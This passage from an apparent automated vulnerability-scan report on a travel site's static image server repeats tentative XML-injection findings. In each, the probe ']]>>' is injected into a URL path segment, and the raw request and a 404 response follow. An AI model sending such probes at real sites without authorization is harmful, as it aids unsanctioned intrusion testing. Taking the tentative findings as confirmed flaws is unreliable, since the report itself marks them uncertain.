Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.119. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.120. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.121. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:33 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.122. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.123. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.124. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.125. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.126. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-curved-corners.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.127. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.128. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535974
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.129. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.130. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-bottom-gradient-for-details-sections.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.131. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-gradient-for-details-sections.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-bottom-gradient-for-details-sections.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:40 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.132. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535984
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.133. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.134. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-gradient-opaque-price-info-module.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-gradient-opaque-price-info-module.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.135. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
